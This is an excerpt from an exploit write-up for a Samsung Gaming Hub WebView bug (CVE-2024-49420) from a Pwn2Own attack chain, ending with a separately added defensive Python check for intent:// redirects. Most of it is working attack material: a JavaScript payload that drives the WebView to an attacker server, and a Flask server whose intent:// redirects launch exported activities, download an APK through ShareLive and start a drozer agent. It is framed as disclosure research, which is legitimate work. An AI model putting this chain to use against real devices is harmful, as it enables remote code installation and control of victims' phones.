Samsung GamingHub Arbitrary Launch Activity - CVE-2024-49420

The below snippet is taken from the full white paper, available here: https://maliciouserection.com/2025/05/13/pwn2own-ireland-2024-samsung-s24-attack-chain-whitepaper.html

I think you should read the white paper instead :)


Exploit Payload

Two payloads are used for this bug. The first payload is the HTML content that is hosted at the URL https://us.mcsvc.samsung.com.maliciouserection.com?yayattackeryay=<attackerServer>. Due to bugs 1 and 2, the Gaming Hub WebView will load and execute the below HTML code.

yaytrampolineyay
<script>

// get hostname and port
var yayquerystringyay = window.location.search;
var yayurlparamsyay = new URLSearchParams(yayquerystringyay);
var yayattackeryay = yayurlparamsyay.get('yayattackeryay');

// open sharelive to start awareservice
location.href="http://" + yayattackeryay + "/yaylaunchshareliveyay";

// redirect after 2 seconds
const yayshorttimeoutyay = setTimeout(yaystartyay, 2000);

// open sharelive and retrieve file
function yaystartyay() {
        location.href="http://" + yayattackeryay + "/yayshareliveyay";
}

// redirect after 15 seconds
const yaytimeoutyay = setTimeout(yayfinalyay, 15000);

// redirect to launch easymover agent
function yayfinalyay() {
        location.href="http://" + yayattackeryay + "/yayfinalyay";

        // redirect after another 15 seconds
        const yaytimeout2yay = setTimeout(yaylaunchyay, 15000);
}

// launch drozer
function yaylaunchyay() {
        location.href="http://" + yayattackeryay + "/yaylaunchyay";
}

</script>

The second payload is a Python script that is hosted on an attacker-controlled server. There are no IP address or domain requirements for this web server, as long as it can be reached via HTTP/S.

By running the below Python script, the attacker will run a Flask-based web server:

from flask import Flask, redirect, url_for, send_from_directory

app = Flask(__name__)

# Route for serving index.html
@app.route('/')
def index():
    return send_from_directory('', 'index.html')

# redirect to open com.sec.android.easyMover.Agent
@app.route('/yayfinalyay')
def yayfinalyay():
    return redirect("intent://#Intent;component=com.sec.android.easyMover.Agent/.ui.SsmUpdateCheckActivity;action=com.sec.android.easyMover.Agent.WATCH_INSTALL_SMART_SWITCH;S.MODE=DIALOG;S.ssm_action=yayactionyay;S.ssm_uri=%63%6f%6e%74%65%6e%74%3a%2f%2f%63%6f%6d%2e%73%61%6d%73%75%6e%67%2e%67%70%75%77%61%74%63%68%61%70%70%2e%48%74%6d%6c%44%75%6d%70%50%72%6f%76%69%64%65%72%2f%79%61%79%2e%61%70%6b;end;", code=302)

# launch sharelive to start the aware service
@app.route('/yaylaunchshareliveyay')
def yaylaunchshareliveyay():
    return redirect("intent://#Intent;component=com.samsung.android.app.sharelive/.presentation.main.MainActivity;end;", code=302)

# sharelive to download yay.apk to arbitrary location
@app.route('/yayshareliveyay')
def yayshareliveyay():
    yayqrcodeyay = "88AKqZwy2Hmr"
    return redirect("intent://qr.quickshare.samsungcloud.com/" + yayqrcodeyay + "#Intent;component=com.samsung.android.app.sharelive/com.samsung.android.app.sharelive.presentation.applink.QrCodeAppLinkActivity;scheme=https;end;", code=302)

# launch drozer
@app.route('/yaylaunchyay')
def yaylaunchyay():
    return redirect("intent://#Intent;component=com.yaydevhackmodyay.drozer/com.mwr.dz.activities.MainActivity;end;", code=302)

# pichu dancing
@app.route('/pichu-dance.gif')
def pichuDance():
    return send_from_directory('', 'pichu-dance.gif')

if __name__ == '__main__':
    context = ('cert.pem', 'key.pem')
    app.run(debug=True, port=8000, host="0.0.0.0")

Exploit Details

Continuing to exploit the Gaming Hub application, the loaded WebView contains code that will execute different actions based on the type of data that is received from the loaded web server.

When the WebView receives a 302 Redirect code from the web server, the class com.samsung.android.game.gamehome.gmp.ui.web.o method shouldOverrideUrlLoading(WebView, WebResourceRequest) is executed. From there, the redirection URL is analyzed.

If the redirection URL has a scheme value of intent://, then the URL is passed to class com.samsung.android.game.gamehome.gmp.ui.web.GmpWebActivity method f(Uri, int).

public final class o extends WebViewClient {
    public final p a; // interface linked with GmpWebActivity
...
    public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
        boolean q;
        ...
        String yayschemeyay = request.getUrl().getScheme();
        Uri yayurlyay = request.getUrl();
        ...
        q = o.q("intent", yayschemeyay, true); // checks whether the scheme matches "intent"
        if (q) {
            this.a.f(yayurlyay, a(yayurlyay)); // a(Uri) checks if the url authority value is either `instantplays` or `cloudgame`
            return true;
        }

Class GmpWebActivity method f(Uri, int) takes the incoming URL and passes it to Android’s internal Intent parser. The Intent parser is commonly used to craft Intent objects based on the incoming URI value. After the Intent object is created, startActivity(Intent) is executed against the Intent object.

public final class GmpWebActivity extends s implements n, p {
...
    public void f(Uri yayurlyay, int i) {
        Intent yayintentyay = Intent.parseUri(yayurlyay.toString(), 0);
        yayintentyay.addFlags(i);
        ...
        a.b(a, this, yayintentyay, false, 2, null);
    }
... 
public final class a {
...
    public static boolean b(a a, Context context, Intent yayintentyay, boolean z, int i, Object obj) {
        ...
        return a.a(context, yayintentyay, z);
    }
    ...
    public final boolean a(Context context, Intent yayintentyay, boolean z) {
        ...
        try {
            context.startActivity(yayintentyay);
            return true;
        ...
    }

BUG 3 – Start Arbitrary Exported Activities

If the web server sends a 302 Redirect HTTP code with a redirect URL starting with intent://, the WebView in Gaming Hub can be forced to start arbitrary activities.

In our exploit chain, the URL https://us.mcsvc.samsung.com.maliciouserection.com?yayattackeryay=<attackerServer> contains HTML code which runs JavaScript. This JavaScript forces the WebView to make a GET request to the attacker-controlled server, defined by the GET parameter “yayattackeryay”.

An attacker should run the previously mentioned Python script, which will host the web server at “<attackerServer>”. This Python script simply returns a 302 Redirect HTTP code, along with different URIs using the `intent://` scheme.

For example, if a GET request is made to “http://<attackerServer>/yaylaunchshareliveyay”, the Python script will return a 302 Redirect HTTP code with the following URI:

intent://#Intent;component=com.samsung.android.app.sharelive/.presentation.main.MainActivity;end;

When the Gaming Hub WebView receives this URI, it will:

  • Pass the URI to Android’s internal Intent parser
  • Craft an Intent object based on the URI
  • Run startActivity(Intent) against the Intent Object

The rest of this exploit chain heavily relies on the ability to launch arbitrary exported Activities by sending different 302 Redirect URIs.
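As an added example (not from the white paper and not Samsung's code), the Python below reproduces the parsing rules Intent.parseUri applies to the intent:// redirects above and pairs them with the check a hardened shouldOverrideUrlLoading should make before startActivity: reject any URI that names an explicit component or package, and accept only the instantplays/cloudgame authorities the decompiled code already inspects. ALLOWED_HOSTS and redirect_allowed are assumptions of this example, not part of the Gaming Hub code.

```python
# Added example (not from the white paper or from Samsung's code): a parser for
# the intent:// URIs used by the 302 redirects above, modelled on the fragment
# grammar Intent.parseUri() accepts, plus the policy a hardened
# shouldOverrideUrlLoading() should apply before calling startActivity().
from urllib.parse import unquote, urlsplit

# Assumption: the authorities the page says GmpWebActivity already recognises.
ALLOWED_HOSTS = {"instantplays", "cloudgame"}


def parse_intent_uri(uri: str) -> dict:
    """Split 'intent://host/path#Intent;key=value;...;end' into its fields."""
    if not uri.startswith("intent:"):
        raise ValueError("not an intent: URI")
    parts = urlsplit(uri)
    items = parts.fragment.split(";")
    if items[0] != "Intent" or "end" not in items:
        raise ValueError("fragment must be '#Intent;...;end'")
    intent = {"host": parts.netloc, "data": None, "action": None,
              "component": None, "package": None, "extras": {}}
    for item in items[1:items.index("end")]:
        key, _, value = item.partition("=")
        value = unquote(value)  # parseUri URL-decodes every value
        if key == "scheme":
            # 'scheme=https' turns the part before '#' into an https: data URI
            intent["data"] = value + uri.split("#", 1)[0][len("intent"):]
        elif key in ("action", "package"):
            intent[key] = value
        elif key == "component":
            pkg, _, cls = value.partition("/")
            if cls.startswith("."):  # '/.ui.Foo' is shorthand for '/<pkg>.ui.Foo'
                cls = pkg + cls
            intent["component"] = pkg + "/" + cls
        elif len(key) > 2 and key[1] == "." and key[0] in "SBbcdfils":
            intent["extras"][key[2:]] = value  # typed extra, e.g. S.MODE=DIALOG
    return intent


def redirect_allowed(uri: str) -> bool:
    """Hardened policy: refuse explicit targets, accept only allowlisted hosts."""
    try:
        intent = parse_intent_uri(uri)
    except ValueError:
        return False
    # An explicit component or package lets the page pick any exported Activity
    if intent["component"] or intent["package"]:
        return False
    return intent["host"] in ALLOWED_HOSTS
```

Running the page's own redirect URIs through redirect_allowed returns False for each of them, because every one carries an explicit component; only a component-free URI whose authority is instantplays or cloudgame passes.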